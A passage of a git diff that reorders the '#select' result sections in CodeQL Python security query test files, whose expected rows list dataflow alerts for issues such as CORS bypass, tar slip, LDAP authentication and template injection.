blob_client | test.py:25:24:25:66 | ControlFlowNode for Attribute() | test.py:31:9:31:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:43:9:43:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:43:9:43:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:75:9:75:10 | ControlFlowNode for bc | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:75:9:75:10 | ControlFlowNode for bc | Unsafe usage of v1 version of Azure Storage client-side encryption | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected index da6e1c5aa1fd..29ecd398a0af 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected @@ -1,6 +1,6 @@ -#select -| InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | Cryptographically insecure $@ in a security context. | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | random value | edges nodes | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths +#select +| InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | Cryptographically insecure $@ in a security context. | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | random value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected index 5816701791cf..32d807c6f6e5 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected @@ -1,5 +1,3 @@ -#select -| Cors.py:8:12:8:17 | ControlFlowNode for origin | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:8:12:8:17 | ControlFlowNode for origin | Potentially incorrect string comparison which could lead to a CORS bypass. | edges | Cors.py:7:9:7:14 | ControlFlowNode for origin | Cors.py:8:12:8:17 | ControlFlowNode for origin | provenance | | | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:7:18:7:52 | ControlFlowNode for Attribute() | provenance | Config | @@ -11,3 +9,5 @@ nodes | Cors.py:7:18:7:52 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | Cors.py:8:12:8:17 | ControlFlowNode for origin | semmle.label | ControlFlowNode for origin | subpaths +#select +| Cors.py:8:12:8:17 | ControlFlowNode for origin | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:8:12:8:17 | ControlFlowNode for origin | Potentially incorrect string comparison which could lead to a CORS bypass. | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected index 69e893a6f42d..1d529f3b3ea0 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected @@ -1,7 +1,3 @@ -#select -| flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | this user input | -| flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | this user input | -| tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | this user input | edges | flask_bad.py:13:5:13:13 | ControlFlowNode for client_ip | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | provenance | | | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:13:5:13:13 | ControlFlowNode for client_ip | provenance | | @@ -20,3 +16,7 @@ nodes | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | semmle.label | ControlFlowNode for client_ip | subpaths +#select +| flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | this user input | +| flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | this user input | +| tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | this user input | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected index 63a573e7c088..b07d47c203c5 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected @@ -1,10 +1,3 @@ -#select -| ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | -| ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | ldap3_remote.py:101:12:101:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | ldap3_remote.py:114:12:114:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | ldap3_remote.py:126:12:126:31 | ControlFlowNode for BinaryExpr | ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | edges | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:2:19:2:25 | ControlFlowNode for request | provenance | | | ldap3_remote.py:2:19:2:25 | ControlFlowNode for request | ldap3_remote.py:138:21:138:27 | ControlFlowNode for request | provenance | | @@ -34,3 +27,10 @@ nodes | ldap3_remote.py:138:21:138:27 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | semmle.label | ControlFlowNode for host | subpaths +#select +| ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | +| ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | ldap3_remote.py:101:12:101:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | ldap3_remote.py:114:12:114:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | ldap3_remote.py:126:12:126:31 | ControlFlowNode for BinaryExpr | ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected index 0ef7b8b43b79..430e7558fdc6 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected @@ -1,10 +1,3 @@ -#select -| tests.py:16:39:16:47 | ControlFlowNode for file_path | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:16:39:16:47 | ControlFlowNode for file_path | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:16:39:16:47 | ControlFlowNode for file_path | costly Unicode normalization operation | -| tests.py:28:43:28:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:28:43:28:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:28:43:28:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:40:43:40:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:40:43:40:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:40:43:40:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:52:43:52:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:52:43:52:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:52:43:52:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:64:43:64:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:64:43:64:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:64:43:64:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:76:43:76:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:76:43:76:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:76:43:76:43 | ControlFlowNode for r | costly Unicode normalization operation | edges | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:1:35:1:41 | ControlFlowNode for request | provenance | | | tests.py:1:35:1:41 | ControlFlowNode for request | tests.py:12:17:12:23 | ControlFlowNode for request | provenance | | @@ -71,3 +64,10 @@ nodes | tests.py:72:9:72:33 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tests.py:76:43:76:43 | ControlFlowNode for r | semmle.label | ControlFlowNode for r | subpaths +#select +| tests.py:16:39:16:47 | ControlFlowNode for file_path | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:16:39:16:47 | ControlFlowNode for file_path | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:16:39:16:47 | ControlFlowNode for file_path | costly Unicode normalization operation | +| tests.py:28:43:28:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:28:43:28:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:28:43:28:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:40:43:40:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:40:43:40:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:40:43:40:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:52:43:52:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:52:43:52:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:52:43:52:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:64:43:64:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:64:43:64:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:64:43:64:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:76:43:76:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:76:43:76:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:76:43:76:43 | ControlFlowNode for r | costly Unicode normalization operation | diff --git a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected index 6e9c8ff47dc8..cf3a06ac7c8f 100644 --- a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected @@ -1,7 +1,3 @@ -#select -| django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | -| django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | -| django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | django_tests.py:11:26:11:32 | ControlFlowNode for request | django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | Cookie is constructed from a $@. | django_tests.py:11:26:11:32 | ControlFlowNode for request | user-supplied input | edges | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:31 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:31 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | @@ -26,3 +22,7 @@ nodes | django_tests.py:13:59:13:69 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | | django_tests.py:13:59:13:82 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths +#select +| django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | +| django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | +| django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | django_tests.py:11:26:11:32 | ControlFlowNode for request | django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | Cookie is constructed from a $@. | django_tests.py:11:26:11:32 | ControlFlowNode for request | user-supplied input | diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected index 69039d12c4d1..7f83ceae8fe0 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected @@ -1,10 +1,3 @@ -#select -| test.py:15:36:15:39 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:15:36:15:39 | ControlFlowNode for data | Call to hmac.new [position 1] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:25:44:25:47 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:25:44:25:47 | ControlFlowNode for data | Call to hmac.new [keyword msg] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:35:10:35:13 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:35:10:35:13 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:36:13:36:16 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:36:13:36:16 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:43:22:43:25 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:43:22:43:25 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:44:25:44:28 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:44:25:44:28 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | edges | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:5:26:5:32 | ControlFlowNode for request | provenance | | | test.py:5:26:5:32 | ControlFlowNode for request | test.py:13:16:13:22 | ControlFlowNode for request | provenance | | @@ -75,3 +68,10 @@ nodes | test.py:54:12:54:35 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:55:17:55:20 | ControlFlowNode for data | semmle.label | ControlFlowNode for data | subpaths +#select +| test.py:15:36:15:39 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:15:36:15:39 | ControlFlowNode for data | Call to hmac.new [position 1] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:25:44:25:47 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:25:44:25:47 | ControlFlowNode for data | Call to hmac.new [keyword msg] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:35:10:35:13 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:35:10:35:13 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:36:13:36:16 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:36:13:36:16 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:43:22:43:25 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:43:22:43:25 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:44:25:44:28 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:44:25:44:28 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | diff --git a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected index abdccddd631b..6f98ea1aae2b 100644 --- a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected +++ b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected @@ -1,13 +1,3 @@ -#select -| tarslip.py:15:1:15:3 | ControlFlowNode for tar | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:15:1:15:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:20:17:20:21 | ControlFlowNode for entry | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | tarslip.py:20:17:20:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:39:17:39:21 | ControlFlowNode for entry | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | tarslip.py:39:17:39:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:43:24:43:26 | ControlFlowNode for tar | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | tarslip.py:43:24:43:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:61:21:61:25 | ControlFlowNode for entry | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | tarslip.py:61:21:61:25 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:91:1:91:3 | ControlFlowNode for tar | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | tarslip.py:91:1:91:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:96:17:96:21 | ControlFlowNode for entry | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | tarslip.py:96:17:96:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:110:1:110:3 | ControlFlowNode for tar | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | tarslip.py:110:1:110:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:113:24:113:26 | ControlFlowNode for tar | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | tarslip.py:113:24:113:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | potentially untrusted source | edges | tarslip.py:14:1:14:3 | ControlFlowNode for tar | tarslip.py:15:1:15:3 | ControlFlowNode for tar | provenance | | | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:14:1:14:3 | ControlFlowNode for tar | provenance | | @@ -64,3 +54,13 @@ nodes | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tarslip.py:113:24:113:26 | ControlFlowNode for tar | semmle.label | ControlFlowNode for tar | subpaths +#select +| tarslip.py:15:1:15:3 | ControlFlowNode for tar | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:15:1:15:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:20:17:20:21 | ControlFlowNode for entry | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | tarslip.py:20:17:20:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:39:17:39:21 | ControlFlowNode for entry | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | tarslip.py:39:17:39:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:43:24:43:26 | ControlFlowNode for tar | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | tarslip.py:43:24:43:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:61:21:61:25 | ControlFlowNode for entry | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | tarslip.py:61:21:61:25 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:91:1:91:3 | ControlFlowNode for tar | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | tarslip.py:91:1:91:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:96:17:96:21 | ControlFlowNode for entry | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | tarslip.py:96:17:96:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:110:1:110:3 | ControlFlowNode for tar | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | tarslip.py:110:1:110:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:113:24:113:26 | ControlFlowNode for tar | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | tarslip.py:113:24:113:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | potentially untrusted source | diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected index a4bf57e174c1..f92107728395 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected @@ -1,6 +1,3 @@ -#select -| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | -| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | edges | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | provenance | | @@ -14,3 +11,6 @@ nodes | JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | subpaths +#select +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This 